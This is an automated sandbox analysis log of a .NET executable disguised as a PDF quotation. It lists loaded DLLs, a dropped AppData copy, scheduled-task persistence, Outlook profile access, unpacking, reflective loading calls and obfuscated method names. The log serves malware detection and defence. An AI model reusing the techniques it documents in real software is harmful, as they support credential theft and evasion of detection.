                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: samlib.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeSection loaded: textshaping.dll
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeSection loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeSection loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                    Source: Quotation2025-0107pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Quotation2025-0107pdf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeUnpacked PE file: 0.2.Quotation2025-0107pdf.exe.ce0000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeUnpacked PE file: 0.2.Quotation2025-0107pdf.exe.ce0000.0.unpack
                    Source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack, DlRvq5yJkomY4LIf3S.cs.Net Code: X2WPMWey8AqqJOPa61l(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{X2WPMWey8AqqJOPa61l(typeof(IntPtr).TypeHandle),typeof(Type)})
                    Source: 0.2.Quotation2025-0107pdf.exe.9a00000.6.raw.unpack, DlRvq5yJkomY4LIf3S.cs.Net Code: X2WPMWey8AqqJOPa61l(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{X2WPMWey8AqqJOPa61l(typeof(IntPtr).TypeHandle),typeof(Type)})
                    Source: 0.2.Quotation2025-0107pdf.exe.4ae8e90.5.raw.unpack, DlRvq5yJkomY4LIf3S.cs.Net Code: X2WPMWey8AqqJOPa61l(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{X2WPMWey8AqqJOPa61l(typeof(IntPtr).TypeHandle),typeof(Type)})
                    Source: 9.2.mexnJkivovwH.exe.3cea8a0.4.raw.unpack, DlRvq5yJkomY4LIf3S.cs.Net Code: X2WPMWey8AqqJOPa61l(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{X2WPMWey8AqqJOPa61l(typeof(IntPtr).TypeHandle),typeof(Type)})
                    Source: 9.2.mexnJkivovwH.exe.3cca880.3.raw.unpack, DlRvq5yJkomY4LIf3S.cs.Net Code: X2WPMWey8AqqJOPa61l(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{X2WPMWey8AqqJOPa61l(typeof(IntPtr).TypeHandle),typeof(Type)})
                    Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, mndwbrCbxIcjOGXSCv.cs.Net Code: TT4NxstdUO System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, mndwbrCbxIcjOGXSCv.cs.Net Code: TT4NxstdUO System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, mndwbrCbxIcjOGXSCv.cs.Net Code: TT4NxstdUO System.Reflection.Assembly.Load(byte[])
                    Source: Yara matchFile source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.mexnJkivovwH.exe.3ebf078.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.mexnJkivovwH.exe.3c45590.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.mexnJkivovwH.exe.3c45590.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.mexnJkivovwH.exe.3ebf078.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.mexnJkivovwH.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.mexnJkivovwH.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1749098659.000000000245E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1751386297.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1751386297.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Quotation2025-0107pdf.exe PID: 7332, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: mexnJkivovwH.exe PID: 7908, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: mexnJkivovwH.exe PID: 8124, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_018C6F63 push edx; iretd 0_2_018C6F64
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_018C6A59 push DEFFFFFEh; retf 0_2_018C6A5E
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_0A1B6815 pushad ; iretd 0_2_0A1B6817
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_0A1B682A pushad ; iretd 0_2_0A1B682B
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_0A1B89DC pushad ; iretd 0_2_0A1B89DD
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_0A1B3FA7 pushfd ; iretd 0_2_0A1B3FA8
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_0A1B67F1 pushad ; iretd 0_2_0A1B67F3
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_00A76A59 push DEFFFFFEh; retf 9_2_00A76A5E
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_00A76F63 push edx; iretd 9_2_00A76F64
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 13_2_00402AC0 push eax; ret 13_2_00402AD4
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 13_2_00402AC0 push eax; ret 13_2_00402AFC
                    Source: Quotation2025-0107pdf.exeStatic PE information: section name: .text entropy: 7.401526227264673
                    Source: mexnJkivovwH.exe.0.drStatic PE information: section name: .text entropy: 7.401526227264673
                    Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, IbChofHBavJhR0AihhL.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lfoL8HFeZe', 'ha8LUliL5e', 'wIXLo30fM4', 'vQGLu6Cd8h', 'gRsLWIqSLw', 'QfULDqeR1h', 'VPDLRDnOu3'
                    Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, tsV8XMYQesaCGZGGyJ.csHigh entropy of concatenated method names: 'zH3gdLsfL7', 'GTIgATpmr5', 'lOEg6ba8wq', 'X6Ygyq72vq', 'Dr1gCiphi5', 'unO6t2YICV', 'd556qY0lCD', 'nQ56hNM0OQ', 'KNG6rPpeIw', 'F8j6QcTK79'
                    Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, skE5SkQ10Ym0sHKx4c.csHigh entropy of concatenated method names: 'GUkeYbW8UU', 'l5pewCrs3m', 'YixeXVcgBp', 'cCyemHchUy', 'uPLeiQp0AS', 'ipHesOgvgf', 'SgyentrBXX', 'kQXe7ljDel', 'HqleK0dGXM', 'yaOebDEh24'
                    Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, qEgAcuoEHnySCyVCiE.csHigh entropy of concatenated method names: 'sATfkjrxTh', 'TVBf91dNIZ', 'VVgfYjS3Qg', 'GCEfw9sDdG', 'q7sfmIG5Y0', 'xEdfi7XHrf', 'IQNfn6OWu2', 'lWsf7A75s8', 'N6VfbIps1h', 'inif85KAnX'
                    Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, rx2adFKqKDDvpdwsNE.csHigh entropy of concatenated method names: 'AJWy4Nl5or', 'S1iyJCHBmM', 'KIjyxIUuCA', 'J0Dy0R6kyQ', 'x1Cy1rYI2U', 'JsRycT9IL2', 'oOFyOqXClQ', 'r2oykGWdCx', 'lEQy9bP8B4', 'cfmyaaOGGL'
                    Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, YJwornhL8NcUHM6d3H.csHigh entropy of concatenated method names: 'AdleVp5KX0', 'fXVeGJxhxm', 'F6oeerNqxF', 'NKve2IUPbK', 'LVPeIvcxBe', 'AiCevs6dIO', 'Dispose', 'YvaFj5ApOO', 'Sk2FA7Zq4x', 'tMMFPiRPK7'
                    Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, bY2l2W9aTvqvV3SIa6.csHigh entropy of concatenated method names: 'i7tP0rcAma', 'DVRPcYKoOb', 'KAMPkCSVFc', 'ni3P9N3MG8', 'yObPVcYRZi', 'mQ1P5hA0Lc', 'FSiPGuZ7KG', 'Hv0PFI0MYk', 'CGQPeMr0fP', 'BRNPL8vxPr'
                    Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, F7edAXSK92OBYECXq6.csHigh entropy of concatenated method names: 'lQTxs9hkv', 'GqJ0DsyJl', 'CbNcytVV4', 'QneOSAi9o', 'PBY9YuJXy', 'HQAa3y27i', 'hgxjV3DFItn00kKthB', 'KcSHfpestFmg0cqrIB', 'r8GF5Vcj0', 'kH5L9Pga3'
                    Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, Rp2frEnK0ssvc1GG09.csHigh entropy of concatenated method names: 'SdRyjBHoba', 'HNDyPDTV84', 'fLOygavwjW', 'HJEgZopU44', 'z6Tgz6ivjc', 'keEyBJcmK3', 'r9UyHLabEu', 'MJVySvZldv', 'gK3ylmC6jZ', 'XS6yNfTq2h'
                    Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, fZqjEMzUF5Mu3o6cex.csHigh entropy of concatenated method names: 'vUULcY6vXo', 'vejLkUuwn0', 'JrUL9MYGdE', 'X5ZLYccuDK', 'bfULwIXXVl', 'cfKLmTQFNO', 'B04LiBdpPQ', 'WfTLvCvagx', 'pUML46N62O', 'ogZLJSAoSF'
                    Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, q1NDsIahNrqhQyscMU.csHigh entropy of concatenated method names: 'nBs61LLEl9', 'ae36OA4pew', 'YE2PXV3lsR', 'B6VPmp75Gc', 'WsrPiGeQQx', 'aPWPsH1QeA', 'fEDPnvK6Gn', 'jI0P77ghml', 'BTxPKm9inR', 'CWePbh7YCP'
                    Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, AUokIxRdW3ZZkuiCsM.csHigh entropy of concatenated method names: 'BnrGTCkjXJ', 'BRHGEvcb5u', 'ToString', 'wxCGj0OxsT', 'qqZGAHrnk0', 'QDcGPTApPh', 'VYfG69vwIK', 'zp9GgbVE86', 'HW4GykGwGb', 'eELGCxwBRk'
                    Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, IodeJPNUOx7OkleCZR.csHigh entropy of concatenated method names: 'MIYHy6M6jn', 'NXAHCxGXHK', 'SaTHTvqvV3', 'cIaHE6G1ND', 'jscHVMU2sV', 'OXMH5QesaC', 'XSqxqG3IlbgqNnoqyE', 'OG14L2tdWAN5rA0p0o', 'PD6HHrgjTd', 'fNXHlavHR3'
                    Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, G6M6jnkKXAxGXHKNmU.csHigh entropy of concatenated method names: 'RhHAuyfVay', 'EjmAWgsBv0', 'cyZADh1wPG', 'dlQARVAKyh', 'V1JAtrYOZZ', 'K9VAqJigVX', 'lOvAhAoSeC', 'uIMArJuIbq', 'Iv7AQKXBuS', 'wZCAZpWt84'
                    Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, ld8Zy6HNxVOyY3u02Wr.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Dv83eB6BAM', 'eKH3LU0ctO', 'fSd32xwoeU', 'Sh033cAh9M', 'tcb3IWxvMR', 'm7O3MbcFyt', 'pE23vZnQtg'
                    Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, NhTCM9Z8e83c1vPLAZ.csHigh entropy of concatenated method names: 'JjNLPkN8R5', 'J9LL6G34Qr', 'ELsLgo0T0p', 'jotLyVkCHd', 'QCkLe8pli1', 'Xr9LCNYnRF', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, P8C9rkDoMuYdUq0kte.csHigh entropy of concatenated method names: 'ToString', 'RCE58DZcIi', 'bxH5wIxlRM', 'lRl5XfT1HJ', 'MGS5m2cgVJ', 'Oe35inHI28', 'xSH5sGBLmv', 'OWh5nEIULc', 'PSV57Zjk5o', 'bXd5K6Kdc9'
                    Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, mndwbrCbxIcjOGXSCv.csHigh entropy of concatenated method names: 'GivldaEnxd', 'fy0ljf0lU2', 'ofJlAUM4s4', 'OgplPyqTsn', 'TK9l6xSGrF', 'Ey9lgPt55u', 'yiDlyDHobo', 'X3mlCj2fc1', 'CdGlpGV9yZ', 'BetlTVwmyt'
                    Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, goVFEnuuIYdGElAf1P.csHigh entropy of concatenated method names: 'vykVbHNOKT', 'OUeVUWsclK', 'G9iVutd1h9', 'iLGVWIwvMU', 'DTxVwsv1Ab', 'wosVXS0v9g', 'trDVmKmDbI', 'XbsViGEwp4', 'A1aVsxiIK1', 'ucVVn0TCIk'
                    Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, YGKv1VHHY7YGJjaWvBI.csHigh entropy of concatenated method names: 'nI3LZxxUXD', 'iLnLzCkK9c', 'mOQ2BHuaDV', 'RNh2Hi9b4U', 'jkf2SundNl', 'uBM2lMpKbJ', 'xXc2Nwt4wf', 'lOd2d1QWdw', 'NVM2jvmX5S', 'Qb82AkLyyu'
                    Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, uqSudIA7xkgfkKu8uq.csHigh entropy of concatenated method names: 'Dispose', 'dcUHQHM6d3', 'JkjSw0PTv4', 'QJ2gijO3uO', 'asTHZkb1WS', 'qsXHzrjauA', 'ProcessDialogKey', 'UfLSBkE5Sk', 'B0YSHm0sHK', 'z4cSSKhTCM'
                    Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, BF0ad2PdcQycQg2Ypw.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'n77SQ5vIRj', 'CUcSZnFngs', 'gA6SzZm41d', 'vlKlBJ3MYl', 'LX1lHtEfOR', 'a4klStPnVD', 'caIllx590p', 'zKbJBukJpbZV2fvDCij'
                    Source: 0.2.Quotation2025-0107pdf.exe.d390000.7.raw.unpack, g2kfQWqWgG7d7Kou8E.csHigh entropy of concatenated method names: 'HjWGrrtISR', 'G5MGZ9AMyZ', 'f5YFBPT1vF', 'PlMFHwXnLI', 'qd1G8KQO4P', 'b3BGUV2xsv', 'dcnGob7QLw', 'VNHGuHtYkw', 'qfxGWKyyrt', 'Jj4GD1Slgd'
                    Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, IbChofHBavJhR0AihhL.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lfoL8HFeZe', 'ha8LUliL5e', 'wIXLo30fM4', 'vQGLu6Cd8h', 'gRsLWIqSLw', 'QfULDqeR1h', 'VPDLRDnOu3'
                    Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, tsV8XMYQesaCGZGGyJ.csHigh entropy of concatenated method names: 'zH3gdLsfL7', 'GTIgATpmr5', 'lOEg6ba8wq', 'X6Ygyq72vq', 'Dr1gCiphi5', 'unO6t2YICV', 'd556qY0lCD', 'nQ56hNM0OQ', 'KNG6rPpeIw', 'F8j6QcTK79'
                    Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, skE5SkQ10Ym0sHKx4c.csHigh entropy of concatenated method names: 'GUkeYbW8UU', 'l5pewCrs3m', 'YixeXVcgBp', 'cCyemHchUy', 'uPLeiQp0AS', 'ipHesOgvgf', 'SgyentrBXX', 'kQXe7ljDel', 'HqleK0dGXM', 'yaOebDEh24'
                    Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, qEgAcuoEHnySCyVCiE.csHigh entropy of concatenated method names: 'sATfkjrxTh', 'TVBf91dNIZ', 'VVgfYjS3Qg', 'GCEfw9sDdG', 'q7sfmIG5Y0', 'xEdfi7XHrf', 'IQNfn6OWu2', 'lWsf7A75s8', 'N6VfbIps1h', 'inif85KAnX'
                    Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, rx2adFKqKDDvpdwsNE.csHigh entropy of concatenated method names: 'AJWy4Nl5or', 'S1iyJCHBmM', 'KIjyxIUuCA', 'J0Dy0R6kyQ', 'x1Cy1rYI2U', 'JsRycT9IL2', 'oOFyOqXClQ', 'r2oykGWdCx', 'lEQy9bP8B4', 'cfmyaaOGGL'
                    Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, YJwornhL8NcUHM6d3H.csHigh entropy of concatenated method names: 'AdleVp5KX0', 'fXVeGJxhxm', 'F6oeerNqxF', 'NKve2IUPbK', 'LVPeIvcxBe', 'AiCevs6dIO', 'Dispose', 'YvaFj5ApOO', 'Sk2FA7Zq4x', 'tMMFPiRPK7'
                    Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, bY2l2W9aTvqvV3SIa6.csHigh entropy of concatenated method names: 'i7tP0rcAma', 'DVRPcYKoOb', 'KAMPkCSVFc', 'ni3P9N3MG8', 'yObPVcYRZi', 'mQ1P5hA0Lc', 'FSiPGuZ7KG', 'Hv0PFI0MYk', 'CGQPeMr0fP', 'BRNPL8vxPr'
                    Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, F7edAXSK92OBYECXq6.csHigh entropy of concatenated method names: 'lQTxs9hkv', 'GqJ0DsyJl', 'CbNcytVV4', 'QneOSAi9o', 'PBY9YuJXy', 'HQAa3y27i', 'hgxjV3DFItn00kKthB', 'KcSHfpestFmg0cqrIB', 'r8GF5Vcj0', 'kH5L9Pga3'
                    Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, Rp2frEnK0ssvc1GG09.csHigh entropy of concatenated method names: 'SdRyjBHoba', 'HNDyPDTV84', 'fLOygavwjW', 'HJEgZopU44', 'z6Tgz6ivjc', 'keEyBJcmK3', 'r9UyHLabEu', 'MJVySvZldv', 'gK3ylmC6jZ', 'XS6yNfTq2h'
                    Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, fZqjEMzUF5Mu3o6cex.csHigh entropy of concatenated method names: 'vUULcY6vXo', 'vejLkUuwn0', 'JrUL9MYGdE', 'X5ZLYccuDK', 'bfULwIXXVl', 'cfKLmTQFNO', 'B04LiBdpPQ', 'WfTLvCvagx', 'pUML46N62O', 'ogZLJSAoSF'
                    Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, q1NDsIahNrqhQyscMU.csHigh entropy of concatenated method names: 'nBs61LLEl9', 'ae36OA4pew', 'YE2PXV3lsR', 'B6VPmp75Gc', 'WsrPiGeQQx', 'aPWPsH1QeA', 'fEDPnvK6Gn', 'jI0P77ghml', 'BTxPKm9inR', 'CWePbh7YCP'
                    Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, AUokIxRdW3ZZkuiCsM.csHigh entropy of concatenated method names: 'BnrGTCkjXJ', 'BRHGEvcb5u', 'ToString', 'wxCGj0OxsT', 'qqZGAHrnk0', 'QDcGPTApPh', 'VYfG69vwIK', 'zp9GgbVE86', 'HW4GykGwGb', 'eELGCxwBRk'
                    Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, IodeJPNUOx7OkleCZR.csHigh entropy of concatenated method names: 'MIYHy6M6jn', 'NXAHCxGXHK', 'SaTHTvqvV3', 'cIaHE6G1ND', 'jscHVMU2sV', 'OXMH5QesaC', 'XSqxqG3IlbgqNnoqyE', 'OG14L2tdWAN5rA0p0o', 'PD6HHrgjTd', 'fNXHlavHR3'
